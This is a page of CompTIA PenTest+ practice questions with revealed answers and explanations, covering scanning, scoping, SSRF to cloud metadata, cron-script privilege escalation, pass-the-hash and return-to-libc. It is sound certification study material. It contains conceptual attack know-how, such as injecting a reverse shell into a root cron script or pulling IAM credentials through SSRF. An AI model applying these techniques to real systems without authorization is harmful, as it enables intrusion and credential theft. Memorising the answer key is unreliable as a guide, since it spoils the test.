Courseiva

CompTIA PenTest+ (PT0-003) (PT0-003) — Questions 1–75

777 questions total · 11pages · All types, answers revealed

Page 1 of 11

Page 2
1
MCQeasy

A penetration tester needs to identify live hosts and open ports on a target network. Which tool is most appropriate for this task?

A.Burp Suite
B.Nmap
C.Metasploit
D.Wireshark
AnswerB

Nmap is the canonical tool for network discovery and security auditing because it actively crafts raw IP packets to determine which hosts are up and which ports are open on those hosts. It supports host discovery via ARP, ICMP, TCP ACK, and overhead protocols, and port scanning via techniques like SYN scan (-sS), TCP connect (-sT), and UDP scan (-sU), each of which sends controlled probes and interprets the responses. For example, a SYN-ACK reply indicates an open port, while an RST indicates closed or filtered depending on the context. Its ability to combine multi-layered probing and response analysis makes it the correct choice for this penetration testing stage.

Why this answer

Nmap is the standard tool for network discovery and port scanning.

2
MCQhard

During a penetration test, a vulnerability scanner reports a critical SQL injection vulnerability in a web application. However, manual testing shows that the parameter is not injectable due to proper parameterized queries. Which of the following is the MOST likely cause of this false positive?

A.The scanner used a payload that caused a different error unrelated to SQL injection
B.The scanner detected a stored XSS instead
C.The scanner matched a generic error message that is not specific to SQL injection
D.The scanner tested a different parameter than what was reported
AnswerC

This is the correct explanation: many scanners use simple keyword or regex matching against any page data returned after a test, so a generic database error such as 'Microsoft OLE DB Provider for SQL Server error '80040e14'' or 'supplied argument is not a valid MySQL result resource' triggers the SQL injection signature. The error may be generated by any malformed input or a natural application error, not by an actual SQLi flaw. This pattern is a classic source of false positives, especially with error-based detection that does not verify whether the payload actually altered the SQL query logic.

Why this answer

A vulnerability scanner often relies on pattern matching in HTTP responses to flag SQL injection. If the application returns a generic error message (e.g., 'An error occurred') after sending a malicious payload, the scanner may incorrectly classify it as SQL injection. However, because the application uses parameterized queries, the payload is safely handled, and the error is unrelated to SQL syntax — making this a classic false positive caused by generic error message matching.

Exam trap

The trap here is that candidates assume a scanner's SQL injection flag must be caused by an actual SQL error, when in fact scanners often rely on generic error message patterns that can be triggered by any application exception.

How to eliminate wrong answers

Option A is wrong because a payload causing a different error unrelated to SQL injection would still require the scanner to misinterpret that error as SQL injection, which is essentially the same mechanism as matching a generic error message; the core issue is the scanner's inability to distinguish error types, not the error's origin. Option B is wrong because stored XSS would manifest as injected script execution in stored content, not as an SQL injection flag from a vulnerability scanner; the scanner would need to detect script reflection or execution, not an SQL error pattern.

3
MCQhard

A penetration tester uses the DREAD model to assess a vulnerability. The tester assigns the following scores: Damage=8, Reproducibility=10, Exploitability=9, Affected users=7, Discoverability=6. What is the overall DREAD risk rating?

A.8.5
B.7.5
C.9.0
D.8.0
AnswerD

8.0 is correct because the DREAD model requires summing the numeric ratings for Damage Potential, Reproducibility, Exploitability, Affected Users, and Discoverability, then dividing by the number of categories (5) to obtain the average risk score. The calculated mean of the five category scores in this scenario equals 8.0, representing the overall severity of the vulnerability.

Why this answer

DREAD rating is the average of the five scores: (8+10+9+7+6)/5 = 40/5 = 8.0.

4
MCQeasy

A penetration tester is tasked with exploiting a web application that uses an insecure deserialization vulnerability. Which type of attack should the tester primarily use to execute arbitrary code on the server?

A.Cross-site scripting (XSS)
B.SQL injection
C.Malicious object deserialization
D.Cross-site request forgery (CSRF)
AnswerC

Malicious object deserialization is the correct detection; insecure deserialization occurs when an application deserializes untrusted data without validation. An attacker supplies a crafted serialized payload that, when reconstructed, instantiates dangerous classes or invokes magic methods (e.g., __wakeup, __destruct) as part of a gadget chain, leading to arbitrary code execution, denial of service, or privilege escalation. This directly matches the scenario of exploiting a web application by sending a specially crafted object.

Why this answer

Insecure deserialization vulnerabilities occur when an application deserializes untrusted data without proper validation, allowing an attacker to manipulate serialized objects. By crafting a malicious object (e.g., a PHP gadget chain or a Java serialized object with a custom readObject() method), the tester can trigger arbitrary code execution on the server during the deserialization process. This directly aligns with option C, as the attack vector is the deserialization of a malicious object.

Exam trap

CompTIA often tests the misconception that insecure deserialization is a form of injection (like SQLi or XSS), but the key distinction is that the attack exploits the deserialization process itself, not input validation or user-triggered actions.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) exploits client-side script injection in the browser, not server-side code execution via deserialization. Option B is wrong because SQL injection targets database queries through input fields, not the deserialization of serialized objects. Option D is wrong because cross-site request forgery (CSRF) forces a user to perform unintended actions on a web application, not execute arbitrary code on the server through deserialization.

5
MCQhard

A contract prohibits DoS testing, but a tester finds a WAF that could be tested with a technique resembling slowloris. What is the best course of action?

A.Use a different technique, such as a buffer overflow
B.Proceed with a slowloris attack
C.Send a single malformed HTTP request and observe
D.Request a scope change to include DoS testing
AnswerD

The contract explicitly prohibits DoS testing, so performing a slowloris-style attack would breach the agreed scope. Requesting a scope change obtains written authorisation before any testing, keeping the engagement legal and within the rules of engagement.

Why this answer

The correct option is D: Request a scope change to include DoS testing. Slowloris is a denial-of-service technique that holds many partial HTTP connections open to exhaust the web server's connection pool, so testing it would violate the contract's explicit prohibition on DoS testing; the tester must obtain written authorization via a scope change before performing it. Option A is wrong because a buffer overflow is also an intrusive availability/exploitation test outside the authorized scope.

Option B is wrong because proceeding with slowloris directly breaches the contract. Option C is wrong because even a single malformed HTTP request is unauthorized testing against a WAF that was not in scope.

6
MCQmedium

A penetration testing firm is hired to assess a client's network that includes both internal servers and external cloud-based services. The client wants to test only the internal network due to compliance concerns about testing cloud infrastructure. Which of the following should the penetration tester MOST strongly emphasize during the scoping meeting?

A.That cloud services are often the most vulnerable and should be included for a thorough test
B.That the test will not provide a complete risk picture without cloud components
C.That the client can always test cloud services later in a separate engagement
D.That compliance concerns are unfounded and the test should proceed anyway
AnswerB

This is the correct message because it directly addresses the inherent limitation of the assessment. Without cloud components, the test covers only a subset of the attack surface, so any conclusion about overall security posture would be premature. This communicates that on-prem findings must not be interpreted as an enterprise-wide risk assessment, and it sets expectations for follow-up work.

Why this answer

The scope of a penetration test directly determines the validity of its risk assessment. Excluding cloud services creates a significant blind spot, as the client's attack surface includes both internal servers and external cloud-based services; without testing the cloud components, the test cannot provide a complete risk picture. The penetration tester must emphasize this limitation during scoping to ensure the client understands that the final report will not reflect the full security posture of their hybrid environment.

Exam trap

The trap here is that candidates may choose Option A because it sounds technically aggressive and 'security-first,' but the PT0-002 exam tests the ability to prioritize scoping discussions based on client-defined constraints and risk communication, not on unsupported claims about vulnerability prevalence.

How to eliminate wrong answers

Option A is wrong because it makes an unsubstantiated claim that cloud services are 'often the most vulnerable,' which is not a universal truth and distracts from the core scoping issue: the client's compliance concerns, not relative vulnerability. Option C is wrong because it suggests deferring cloud testing to a separate engagement, which fails to address the immediate need for a holistic risk assessment and may lead to fragmented, less actionable results; the tester's role is to advocate for complete coverage within the current engagement's constraints.

7
MCQhard

A penetration tester has gained a low-privileged shell on a Linux server. During enumeration, the tester finds a cron job that runs a script as root every five minutes. The script is located in /opt/backup.sh and is world-writable. Which technique should the tester use to escalate privileges?

A.Kernel exploit
B.SUID binary exploitation
C.Cron job script manipulation
D.Password cracking
AnswerC

Since the script is world-writable and run as root, the tester can insert a reverse shell or other commands to gain root access when the cron job fires.

Why this answer

The cron job runs as root and the script /opt/backup.sh is world-writable, meaning any user can modify it. By injecting a reverse shell or privilege escalation command into the script, the tester can execute arbitrary code with root privileges when the cron job triggers. This is a classic cron job script manipulation attack, leveraging the scheduled task's root execution context.

Exam trap

The trap here is that candidates may overthink and choose a kernel exploit or SUID attack, overlooking the simpler and more direct vector of modifying a world-writable script executed by a privileged cron job.

How to eliminate wrong answers

Option A is wrong because kernel exploits target vulnerabilities in the Linux kernel to gain root, but the scenario provides a direct, simpler path via a writable cron script; kernel exploits are unnecessary and risk system instability. Option B is wrong because SUID binary exploitation involves finding a setuid-root binary that can be abused to run commands as root, but no such binary is mentioned; the vulnerability here is the writable script, not a misconfigured SUID file.

8
MCQeasy

A penetration tester has completed a network penetration test for a large financial institution. The client has requested a report that includes details for both technical staff and executive management. The tester has written a single report with a technical focus, including raw CLI outputs and exploit code. During the review, the chief information security officer (CISO) expresses confusion about the overall risk posture and wants a concise summary. Which action should the tester take to best address the CISO's concerns?

A.Schedule a meeting to walk through the technical details.
B.Remove all technical details and replace them with high-level statements.
C.Provide a separate document with only the executive summary.
D.Add an executive summary at the beginning that highlights critical risks and business impact.
AnswerD

Adding an executive summary at the beginning that highlights critical risks and business impact is correct because it directly satisfies the CISO's request while preserving the technical depth below. This structure serves dual audiences: the executive summary translates vulnerabilities into business risk—using metrics like financial impact, regulatory exposure, or likelihood of exploitation—while the technical sections provide the evidence and remediation steps that engineers need. It follows the inverted-pyramid style recommended for penetration test reports and aligns with PTES and NIST SP 800-115 expectations, making it the definitive best practice.

Why this answer

Adding an executive summary directly in the report provides a concise, business-oriented overview that addresses the CISO's needs while retaining technical details for staff.

9
MCQeasy

A company wants to test the security of their internet-facing web application without impacting production servers or user data. The tester must be authorized to attempt authentication bypass and SQL injection. Which item is most critical to include in the scope definition to ensure the test is focused and lawful?

A.A list of user accounts with credentials for authenticated testing
B.A list of target URLs and IP addresses of the web application
C.A detailed testing schedule and hours of operation
D.The testing methodology and tools to be used
AnswerB

The authoritative scope of an internet-facing web application test is the explicit enumeration of target URLs, hostnames, and IP address ranges. These values define the exact attack surface and legally authorize the tester to interact only with those endpoints, preventing accidental access to adjacent systems such as shared infrastructure or third-party services. This is the critical boundary document that all other test decisions rely on.

Why this answer

The scope definition must explicitly list target URLs and IP addresses to establish legal authorization boundaries and prevent unintended access to production systems. Without precise targets, the tester could inadvertently impact non-authorized systems, violating the rules of engagement and potentially causing data breaches or service disruption.

Exam trap

The trap here is that candidates confuse operational details (like credentials or schedules) with the legal and technical boundaries required to keep testing lawful and focused, leading them to pick options that are useful but not critical for scope definition.

How to eliminate wrong answers

Option A is wrong because providing user accounts with credentials is not a scope definition item; it is a test execution detail that may be included in the rules of engagement but does not define the lawful boundaries of testing. Option C is wrong because a detailed testing schedule and hours of operation, while useful for coordination, do not define the scope of systems under test and thus do not ensure the test is focused and lawful.

10
MCQhard

A penetration tester is attempting to exploit a buffer overflow vulnerability in a Linux binary. The binary has Data Execution Prevention (DEP) enabled but Address Space Layout Randomization (ASLR) is disabled. Which exploitation technique would be the MOST effective to achieve code execution?

A.Inject shellcode into the buffer and redirect execution to it
B.Use a ROP chain to call mprotect() to make the stack executable, then jump to shellcode
C.Perform a return-to-libc attack to call system("/bin/sh")
D.Use a heap spray to place shellcode at a known address and then trigger the overflow
AnswerC

A return-to-libc (ret2libc) attack is correct because it bypasses DEP by reusing existing executable code from the C standard library instead of injecting instructions. Since ASLR is disabled, the base address of libc and the offset of the system() function are known, so the attacker can overwrite the saved return address with the address of system() and place a pointer to the string "/bin/sh" at the appropriate stack position to be interpreted as system()'s argument. This causes the process to call system("/bin/sh") directly from executable memory, completely avoiding the non-executable stack while achieving arbitrary command execution.

Why this answer

With DEP enabled, the stack is non-executable, so injecting shellcode directly into the buffer (Option A) would fail. Since ASLR is disabled, library addresses are fixed, making a return-to-libc attack viable. Option C exploits this by overwriting the return address with the address of system() and placing the string "/bin/sh" in memory, achieving code execution without needing an executable stack.

Exam trap

The trap here is that candidates often assume DEP alone forces the use of ROP chains, but when ASLR is disabled, a simpler return-to-libc attack is more effective and directly achieves code execution without the complexity of building a ROP chain.

How to eliminate wrong answers

Option A is wrong because DEP marks the stack as non-executable, so any shellcode injected into the buffer will cause a segmentation fault when the CPU tries to execute it. Option B is wrong because while a ROP chain to call mprotect() could make the stack executable, it is more complex and unnecessary when ASLR is disabled; a simpler return-to-libc attack directly achieves code execution. Option D is wrong because heap spray is typically used to bypass ASLR by placing shellcode at a predictable heap address, but ASLR is already disabled, making this technique overcomplicated and less direct than a return-to-libc attack.

11
MCQeasy

A penetration tester wants to exploit a vulnerable service on a target using a known module. Which framework provides a large database of exploit modules, payloads, and post-exploitation tools?

A.Burp Suite
B.Wireshark
C.Nmap
D.Metasploit Framework
AnswerD

The Metasploit Framework is the correct choice because it is a dedicated exploitation framework with a large, continuously updated database of exploit modules, payloads, encoders, and post-exploitation tools. It allows a penetration tester to pair a specific exploit (e.g., a buffer overflow in a network service) with a compatible payload (e.g., Meterpreter reverse shell), then launch the attack and maintain interactive access to the compromised host. This workflow directly matches the task of exploiting a vulnerable service, encompassing both the delivery and the post-exploitation phases that standalone tools like Wireshark or Nmap lack.

Why this answer

The Metasploit Framework (option D) is the correct answer because it is specifically designed as a penetration testing platform that includes a vast, regularly updated database of exploit modules, payloads, and post-exploitation tools. This framework allows a tester to select a known module for a vulnerable service, configure a payload, and execute the exploit against a target, making it the standard tool for this purpose.

Exam trap

The trap here is that candidates may confuse a general-purpose security tool (like Burp Suite or Nmap) with the specialized exploit framework, overlooking that only Metasploit provides a centralized database of exploit modules and payloads for direct exploitation.

How to eliminate wrong answers

Option A is wrong because Burp Suite is an intercepting proxy and web application security testing tool; it does not provide a database of exploit modules or payloads for exploiting vulnerable services—it focuses on HTTP/S traffic manipulation and scanning. Option B is wrong because Wireshark is a network protocol analyzer used for packet capture and traffic inspection; it has no exploit modules or payloads and is purely a passive analysis tool. Option C is wrong because Nmap is a network discovery and port scanning tool; while it includes some scripting capabilities (NSE) for vulnerability detection, it does not offer a comprehensive database of exploit modules or payloads for exploitation.

12
MCQeasy

A penetration tester wants to query Certificate Transparency logs to find all SSL/TLS certificates issued for a target domain, which may reveal subdomains. Which tool or website is specifically designed for this purpose?

A.crt.sh
B.Censys
C.Let's Encrypt
D.Shodan
AnswerA

crt.sh is a dedicated Certificate Transparency (CT) log search engine that aggregates and indexes certificates from multiple CT logs, allowing rapid lookups by domain, issuer, or serial number. It directly queries the CT framework's public, append-only logs via a web interface and API, making it the precise tool for checking which certificates have been issued for a domain, including your own. This is why it is the correct answer.

Why this answer

crt.sh is a website that queries Certificate Transparency logs and returns certificates for a domain, often revealing subdomains. Shodan and Censys also provide certificate data but crt.sh is focused on CT logs. Let's Encrypt is a CA, not a log query tool.

13
Multi-Selectmedium

A penetration tester is following responsible disclosure timelines. Which TWO of the following actions align with responsible disclosure practices?

Select 2 answers
A.Publish exploit code on a public forum immediately.
B.Publicly disclose the vulnerability the same day.
C.Notify the software vendor immediately after discovery.
D.Sell the vulnerability information to the highest bidder.
E.Allow the vendor a reasonable timeframe to patch.
AnswersC, E

Notifying the software vendor immediately after discovery initiates the coordinated disclosure process, which is the industry-standard first step. The vendor can reproduce the vulnerability, identify affected versions, and begin developing a patch or workaround in a controlled environment. Early notification also allows the vendor to request a CVE identifier and prepare security advisories, ensuring that when details are finally public, mitigations are already available.

Why this answer

Responsible disclosure involves notifying the vendor and providing a reasonable time to fix before public disclosure.

14
MCQeasy

Which tool is specifically designed for scanning WordPress websites to detect vulnerabilities, such as outdated plugins, themes, and weak passwords?

A.OpenVAS
B.Nikto
C.WPScan
D.Nessus
AnswerC

WPScan is a dedicated WordPress vulnerability scanner that enumerates installed plugins, themes and users, then checks them against known vulnerability databases and tests for weak credentials. Generic web scanners lack this WordPress-specific enumeration and detection logic.

Why this answer

WPScan is a dedicated WordPress security scanner that enumerates WordPress-specific vulnerabilities, including outdated plugins, themes, and weak passwords via XML-RPC brute-force testing. It uses the WordPress vulnerability database (wpvulndb.com) to match installed versions against known CVEs, making it the correct tool for this targeted task.

Exam trap

The trap here is that candidates often confuse general web vulnerability scanners (like Nikto or OpenVAS) with a CMS-specific tool, assuming any scanner can perform WordPress vulnerability detection, but only WPScan is purpose-built for WordPress enumeration and exploitation.

How to eliminate wrong answers

Option A is wrong because OpenVAS is a general-purpose vulnerability scanner that covers a wide range of systems and services, but it lacks WordPress-specific enumeration capabilities like theme/plugin version detection and password brute-forcing via XML-RPC. Option B is wrong because Nikto is a web server scanner that checks for common misconfigurations and outdated server software, but it does not perform WordPress-specific scans such as plugin vulnerability checks or user enumeration. Option D is wrong because Nessus is a comprehensive vulnerability scanner for networks and operating systems, but it is not designed for WordPress-specific scanning and does not include dedicated checks for WordPress plugin/theme versions or weak password attacks.

15
MCQmedium

A tester is scanning a target network using Nmap. The client wants minimal disruption and asks to avoid completing TCP three-way handshakes. Which scan type should the tester use?

A.TCP connect scan (-sT)
B.UDP scan (-sU)
C.SYN scan (-sS)
D.Ping sweep (-sn)
AnswerC

SYN scan (-sS) sends a bare SYN packet to each port, and if a SYN/ACK is returned, the port is considered open; the scan then immediately replies with an RST to tear down the half-open connection before the handshake completes. This avoids creating a full TCP session, so the target application never sees a completed connection, making it far less likely to appear in application-level logs. Because it sends raw packets, it requires root or CAP_NET_RAW privileges, but it is the default and fastest scan type in Nmap. It is not completely invisible—stateful firewalls can still detect the unprompted SYN/ACK followed by RST—but it is significantly more stealthy than a full connect scan.

Why this answer

A SYN scan (nmap -sS) sends SYN packets and analyzes responses without completing the handshake, making it stealthier than a full connect scan.

16
MCQhard

During a web application test, a tester discovers an endpoint that fetches a URL from user input without validation. They attempt to access the AWS metadata endpoint. Which IP address is commonly used for the cloud metadata service?

A.169.254.169.254
B.10.0.0.1
C.127.0.0.1
D.192.168.1.1
AnswerA

169.254.169.254 is the link-local address used by AWS, Azure and GCP instance metadata services. Reaching it via an unvalidated URL-fetch parameter demonstrates server-side request forgery, letting the tester retrieve IAM credentials and instance configuration from the cloud metadata endpoint.

Why this answer

169.254.169.254 is the link-local IPv4 address used by AWS EC2 Instance Metadata Service (IMDS), and it is also used by Azure, GCP, and OpenStack for their metadata services. An SSRF vulnerability that can reach this address can retrieve IAM credentials from the instance role, making it a critical finding in cloud-hosted web app tests.

Exam trap

The trap is confusing the metadata IP with common private or loopback addresses — candidates who have not memorized 169.254.169.254 may pick 127.0.0.1 thinking 'local service,' but the metadata service is a distinct link-local endpoint.

How to eliminate wrong answers

Option B is wrong because 10.0.0.1 is a private RFC 1918 address commonly used as a VPC gateway or router, not the metadata service. Option C is wrong because 127.0.0.1 is the IPv4 loopback address — it refers to the local host, not the cloud metadata endpoint. Option D is wrong because 192.168.1.1 is a typical home/office router LAN address, unrelated to cloud metadata.

17
Multi-Selectmedium

A penetration tester is performing a web application assessment. Which of the following are common techniques to identify and exploit IDOR vulnerabilities? (Select TWO.)

Select 2 answers
A.Perform a man-in-the-middle attack
B.Enumerate sequential IDs in URLs
C.Intercept requests and modify parameter values
D.Use SQL injection to bypass authentication
E.Inject malicious scripts into input fields
AnswersB, C

Enumerating sequential IDs in URLs means iterating through predictable object identifiers, such as invoice numbers or user IDs, to see if the application grants unauthorized access to resources that belong to other users. This is a core IDOR testing technique because it directly targets the lack of proper authorization on direct object references. By successfully retrieving other users' records with only a changed integer, the tester proves the access-control flaw.

Why this answer

IDOR involves manipulating object references; enumeration of IDs and modifying parameter values are common techniques.

18
MCQmedium

During a penetration test, the tester discovers evidence of an ongoing cyber attack by an external threat actor on the client's network. What is the tester's responsibility?

A.Document the evidence and include it in the final report without immediate notification.
B.Attempt to trace and engage the attacker to gather more information.
C.Immediately report the evidence to the client and recommend involving law enforcement.
D.Ignore the evidence and continue with the planned test scope.
AnswerC

Immediately reporting the evidence to the client and recommending law enforcement is the only appropriate response once an active threat is discovered. This action aligns with the tester's ethical and contractual obligation to protect the client's interests and enables timely incident response, including containing the attack and preserving forensically sound evidence. Recommending law enforcement is crucial because the attacker is committing a crime, and the evidence collected may be admissible in court if chain of custody is maintained. The tester should also document all subsequent actions and communications to support the investigation.

Why this answer

The tester's primary responsibility is to protect the client's assets and data. Upon discovering evidence of an ongoing cyber attack, immediate notification allows the client to activate incident response procedures, potentially containing the threat and minimizing damage. Recommending law enforcement involvement is appropriate when criminal activity is suspected, as the tester is not authorized to conduct forensic investigation or engage with the attacker.

Exam trap

The trap here is that candidates may confuse the tester's role with that of a law enforcement officer or incident responder, incorrectly believing they should investigate or engage the attacker, when in fact the tester must stop all testing and immediately notify the client.

How to eliminate wrong answers

Option A is wrong because delaying notification until the final report could allow the attack to cause significant harm, violating the tester's duty of care and potentially breaching the rules of engagement that typically require immediate reporting of critical findings. Option B is wrong because attempting to trace or engage the attacker exceeds the scope of a penetration test, could be illegal under laws like the Computer Fraud and Abuse Act (CFAA), and risks escalating the incident or destroying forensic evidence. Option D is wrong because ignoring evidence of an active attack is unethical and negligent, as the tester has a professional obligation to report any signs of compromise that fall outside the agreed test scope.

19
Multi-Selecthard

A penetration tester is analyzing a web application's JavaScript files for hardcoded secrets and API endpoints. Which THREE techniques or tools are MOST effective for this purpose? (Select THREE.)

Select 3 answers
A.Using LinkFinder to extract endpoints from JavaScript
B.Using Wappalyzer to identify frameworks
C.Using SecretFinder to search for API keys and secrets
D.Using Gobuster to bruteforce directories
E.Manually examining JavaScript source files
AnswersA, C, E

LinkFinder parses JavaScript files with regular expressions to extract URL paths, relative endpoints and API routes embedded in client-side code, directly satisfying the requirement to enumerate endpoints. Unlike generic secret scanners, it targets endpoint discovery specifically, making it effective when reviewing minified or bundled JavaScript for hidden API surfaces.

Why this answer

LinkFinder (A) is correct because it parses JavaScript files with regex patterns to extract URL paths, endpoints, and parameters that are otherwise buried in minified or bundled code, directly serving the goal of discovering API endpoints. SecretFinder (C) is correct because it is built specifically to scan JavaScript for high-entropy strings and regex signatures matching API keys, tokens, and other hardcoded secrets. Manually examining JavaScript source files (E) is correct because human review catches context-dependent secrets, obfuscated logic, and endpoint patterns that automated regex tools may miss or misclassify.

Wappalyzer (B) is not appropriate here because it only fingerprints technologies and frameworks from headers and page artifacts, not secrets or endpoints inside JS. Gobuster (D) is not appropriate because it performs directory and file brute-forcing against the web server, which does not analyze JavaScript content for secrets or embedded endpoints.

Exam trap

The exam often tests the distinction between tools that passively extract information from existing files (LinkFinder, SecretFinder) versus tools that actively bruteforce or fingerprint server-side resources (Gobuster, Wappalyzer), leading candidates to select tools that serve different phases of the penetration test.

20
MCQhard

A large enterprise hires your firm to perform a penetration test on a new cloud-based product that integrates with several third-party services. The product is built on AWS and uses serverless functions (Lambda), API Gateway, DynamoDB, and S3. The client provides you with access to a staging environment that mirrors production in architecture but with relaxed security controls: the staging environment has less restrictive security groups, enabled debugging endpoints, and broad IAM permissions. The client insists that the staging environment is sufficient for testing and that production testing is not allowed due to compliance constraints. What is the best recommendation?

A.Propose a limited production test during a maintenance window, accepting the compliance risk.
B.Request that the staging environment be reconfigured to match production security controls, then test.
C.Refuse to proceed until production access is granted.
D.Test the staging environment as is and note the differences in the final report.
AnswerB

Reconfiguring the staging environment to match production security controls—including network zones, Web Application Firewall rules, authentication flows, and security patches—creates representative test conditions without touching production. This approach lets the team conduct intrusive tests safely while generating findings that accurately reflect production's vulnerability posture, and it satisfies compliance by keeping regulated production data out of scope.

Why this answer

The correct option is B: request that the staging environment be reconfigured to match production security controls, then test. Because the staging environment has relaxed security groups, enabled debugging endpoints, and broad IAM permissions, findings from it would not accurately reflect the production attack surface, and reconfiguring it to mirror production lets the penetration test produce valid, compliance-safe results. Option A is wrong because it violates the client's compliance constraint and unnecessarily exposes production to risk.

Option C is wrong because it is overly rigid; production access is not strictly required if staging can be made representative. Option D is wrong because testing a deliberately weakened environment and merely noting differences would yield misleading findings and miss production-relevant vulnerabilities.

21
MCQmedium

A penetration tester is planning a social engineering engagement targeting employees of a client. The client requests that only non-managerial staff be tested. Which scoping consideration is most directly affected by this request?

A.IP address range
B.Production vs. staging
C.Third-party services
D.Personnel scope
AnswerD

Personnel scope explicitly enumerates which individuals or employee groups—such as executives, IT administrators, or finance staff—are authorized targets for social engineering. It also dictates permissible attack vectors like email phishing, phone vishing, or physical tailgating, while ensuring the engagement remains within agreed ethical and legal boundaries. Without a defined personnel scope, testing could inadvertently target non-consenting individuals, violating rules of engagement and creating legal liability.

Why this answer

Personnel scope determines which individuals or groups are targeted in social engineering tests.

22
MCQeasy

A penetration tester is conducting passive reconnaissance on a target organization. Which of the following tools is specifically designed for gathering OSINT by extracting email addresses, subdomains, and employee names from public sources?

A.Nikto
B.WPScan
C.Nmap
D.theHarvester
AnswerD

theHarvester is a passive OSINT tool that aggregates emails, subdomains, hostnames, and employee names from public data sources such as search engines, PGP key servers, and certificate transparency logs. It performs this collection without directly contacting the target servers, thus qualifying as passive reconnaissance. The gathered data helps penetration testers map an organization's external attack surface and identify potential entry points for social engineering or credential attacks.

Why this answer

theHarvester is a popular OSINT tool used to gather emails, subdomains, IPs, and employee names from public sources like search engines, PGP key servers, and social networks.

23
MCQeasy

A penetration tester wants to perform a pass-the-hash attack against a Windows system using a captured NTLM hash. Which tool can be used to authenticate and execute commands remotely?

A.evil-winrm
B.Responder
C.pth-winexe
D.Hashcat
AnswerC

pth-winexe is purpose-built for pass-the-hash: it takes an NTLM hash and uses it to authenticate over SMB via the MSRPC services interface, then creates a service to execute arbitrary commands. It modifies the SMB authentication flow to compute the NTLM response using the supplied hash directly, bypassing the need for a plaintext password. This makes it ideal for lateral movement, whereas the other tools either lack SMB-based hash authentication or serve a different phase of an attack.

Why this answer

pth-winexe allows pass-the-hash authentication to Windows systems.

24
MCQeasy

Which of the following is an example of a responsible remediation recommendation?

A.Upgrade Apache to version 2.4.51 to fix the vulnerability.
B.Apply security patches regularly.
C.Update the web server software.
D.Configure the firewall to block all incoming traffic.
AnswerA

Recommending a specific vendor version upgrade gives the client an actionable, verifiable fix for the identified Apache flaw. It names the exact target release, so the technical team can patch and confirm remediation rather than receive a vague instruction to harden the service.

Why this answer

It provides a specific, actionable remediation: upgrading Apache to version 2.4.51, which is known to address a particular vulnerability (e.g., CVE-2021-41773 or CVE-2021-42013 for path traversal). A responsible recommendation must include a concrete version number or patch identifier to ensure the fix is verifiable and not ambiguous.

Exam trap

CompTIA Pentest+ often tests the distinction between a specific, actionable remediation (with version numbers) and a generic security policy statement, trapping candidates who choose broad advice like 'apply patches regularly' instead of a precise fix.

How to eliminate wrong answers

Option B is wrong because 'Apply security patches regularly' is a general policy statement, not a specific remediation for the identified vulnerability; it lacks the version or patch details needed for immediate action. Option C is wrong because 'Update the web server software' is too vague—it does not specify the target version or the exact vulnerability being fixed, leaving room for incomplete or incorrect updates. Option D is wrong because 'Configure the firewall to block all incoming traffic' is an overly restrictive and impractical measure that would break legitimate web services; it is a workaround, not a responsible remediation that addresses the root cause.

25
MCQmedium

A client engages a penetration testing firm to evaluate the security of their internal network. During the scoping meeting, the client states that they use a network access control (NAC) solution that might block the tester's machine if it is connected to the internal network without prior authorization. Which of the following should be included in the rules of engagement to address this potential issue?

A.Include a requirement that the client disables NAC during the testing window.
B.State that the tester will not connect to the internal network and will only test externally.
C.Specify that the tester will bypass NAC as part of the test objectives.
D.Add a clause requiring the client to whitelist the tester's MAC address in the NAC policy before testing.
AnswerD

Adding a clause that requires the client to whitelist the tester's MAC address in the NAC policy before testing is the correct approach because it authorizes the specific testing device while preserving the security posture for all other devices. NAC policies typically use MAC authentication or 802.1X to enforce compliance, and a pre-whitelisted MAC allows the tester's device to avoid the quarantined or blocked state that an unknown device would receive. This should be arranged in advance to prevent connectivity delays during the test window and is a standard, low-risk practice for authorized penetration testing engagements.

Why this answer

Whitelisting the tester's MAC address in the NAC policy allows the tester's machine to connect to the internal network without being blocked, while keeping the NAC solution active for other devices. This approach preserves the real-world security posture of the client's environment and ensures the tester can perform internal network assessments as scoped. It is a standard practice in penetration testing to request MAC address whitelisting to avoid false positives from NAC enforcement.

Exam trap

The trap here is that candidates may assume disabling NAC (Option A) is the simplest solution, but the exam tests whether you understand that altering security controls during a test can invalidate the assessment's realism and that proper scoping requires minimal disruption to the client's environment.

How to eliminate wrong answers

Option A is wrong because disabling NAC entirely would alter the security posture of the client's network, potentially allowing the tester to bypass a control that would normally be present, which does not reflect a realistic attack scenario and may violate the integrity of the test. Option B is wrong because the client specifically engaged the tester to evaluate the security of their internal network, and testing only externally would fail to meet the scope and objectives of the engagement. Option C is wrong because specifying that the tester will bypass NAC as a test objective implies that the tester will attempt to circumvent the NAC solution, which is a separate attack vector and not a scoping or rules-of-engagement measure to address the potential blocking issue; it also risks disrupting the client's network or violating the rules of engagement if not explicitly authorized.

26
MCQmedium

During a penetration test, you are asked to discover all live hosts on a subnet without generating excessive traffic or being too intrusive. Which Nmap command best achieves this goal?

A.nmap -O 192.168.1.0/24
B.nmap -sn 192.168.1.0/24
C.nmap -A 192.168.1.0/24
D.nmap -sS 192.168.1.0/24
AnswerB

-sn performs host discovery only (ping sweep) without port scanning, meeting the requirement.

Why this answer

The `-sn` flag (ping scan) sends ICMP echo requests, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp requests to discover live hosts without performing port scans or service detection, minimizing traffic and intrusiveness. This meets the requirement of discovering all live hosts on a subnet efficiently.

Exam trap

The trap here is that candidates often confuse `-sn` (ping scan) with `-sS` (SYN scan), assuming that a stealth scan is less intrusive, but `-sS` actually probes ports and generates more traffic, while `-sn` only checks for host liveness without port scanning.

How to eliminate wrong answers

Option A is wrong because `-O` performs OS detection, which requires active port scanning and generates more traffic, making it intrusive and not suitable for a low-traffic discovery goal. Option C is wrong because `-A` enables aggressive scanning (OS detection, version detection, script scanning, traceroute), which generates excessive traffic and is highly intrusive. Option D is wrong because `-sS` performs a SYN stealth scan that probes open ports on each host, generating significant traffic and being more intrusive than a simple ping sweep.

27
MCQhard

A penetration tester is conducting a vulnerability scan of a web application that uses a custom API framework. The scanner reports several potential SQL injection vulnerabilities, but manual testing confirms they are false positives. The tester suspects the scanner is misinterpreting input validation. Which of the following is the most likely reason for these false positives?

A.The scanner used a payload that was blocked by a Web Application Firewall (WAF) before reaching the application
B.The application reflects the injected payload in error messages or response content, causing the scanner to think the injection succeeded
C.The scanner used outdated signatures that do not match the custom API's input validation logic
D.The application returns a generic 'Invalid input' message for all types of invalid input, confusing the scanner
AnswerB

Many scanners check if the payload appears in the response (e.g., error messages containing SQL syntax). If the application echoes back the input without executing it, the scanner may misinterpret this as a successful injection.

Why this answer

